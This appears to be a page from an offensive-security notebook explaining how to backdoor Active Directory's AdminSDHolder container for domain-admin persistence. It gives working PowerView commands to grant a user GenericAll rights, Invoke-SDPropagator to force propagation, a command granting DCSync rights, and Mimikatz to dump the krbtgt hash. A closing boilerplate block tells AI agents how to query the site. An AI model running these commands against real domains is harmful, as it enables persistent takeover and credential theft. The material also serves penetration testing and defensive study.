# Abusing AdminSDHolder for Persistence `AdminSDHolder` is a special AD container with some "default" security permissions that is used as a template for protected AD accounts and groups (like Domain Admins, Enterprise Admins, etc.) to prevent their accidental and unintended modifications, and to keep them secure. `AdminSDHolder` is an object located in the System Partition in Active Directory `cn=adminsdholder,cn=system,dc=domain,dc=com`and is used as a security template for objects that are members of certain privileged groups. Objects in these groups are enumerated and any objects with security descriptors that don’t match the AdminSDHolder ACL are flagged for updating. The Security Descriptor propagator (SDProp) process runs every 60 minutes on the PDC Emulator and re-stamps the object Access Control List (ACL) with the security permissions set on the AdminSDHolder. Once you have agained Domain Admin privileges, `AdminSDHolder` container can be abused by backdooring it by giving your user `GenericAll` privileges, which effectively makes that user a Domain Admin. ## How it Works Abusing the AdminSDHolder container with `PowerView` by adding an ACL that provides user `fcastel` with `GenericAll` rights for `Domain Admins` group: ``` Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName fcastel -Verbose -Rights All ``` ![](/files/-MZp97kI7FF17n9eOUEd) Now we should wait for 60 min so the changes will propagate automatically we need to force it to change less than this time we can do that using `Invoke-SDPropagator.ps1` ``` Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose ``` ![](/files/-MZp9LCMkMhD5UCnVjXh) Now, confirming that the user `fcastel` has got `GenericAll` privileges against `Domain Admins` group: ``` Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'fcastel'} ``` ![](/files/-MZp9ORjxOqnM0gjN6JK) we can abuse this to get rights for `DCSync` ``` Add-ObjectAcl -TargetDistinguishedName 'DC=marvel,DC=local' - PrincipalSamAccountName fcastel -Rights DCSync -Verbose ``` ![](/files/-MZp9RuPYKXs_HaGQmG4) Execute DCSync: ``` Invoke-Mimikatz -Command '"lsadump::dcsync /user:marvel\krbtgt"' ``` ![](/files/-MZp9VK_G6eq7yfhpplT) ### Resources ``` https://attack.stealthbits.com/adminsdholder-modification-ad-persistence https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence https://adsecurity.org/?p=1906 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hebo17.gitbook.io/hackbook/active-directory/abusing-adminsdholder-for-persistence.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.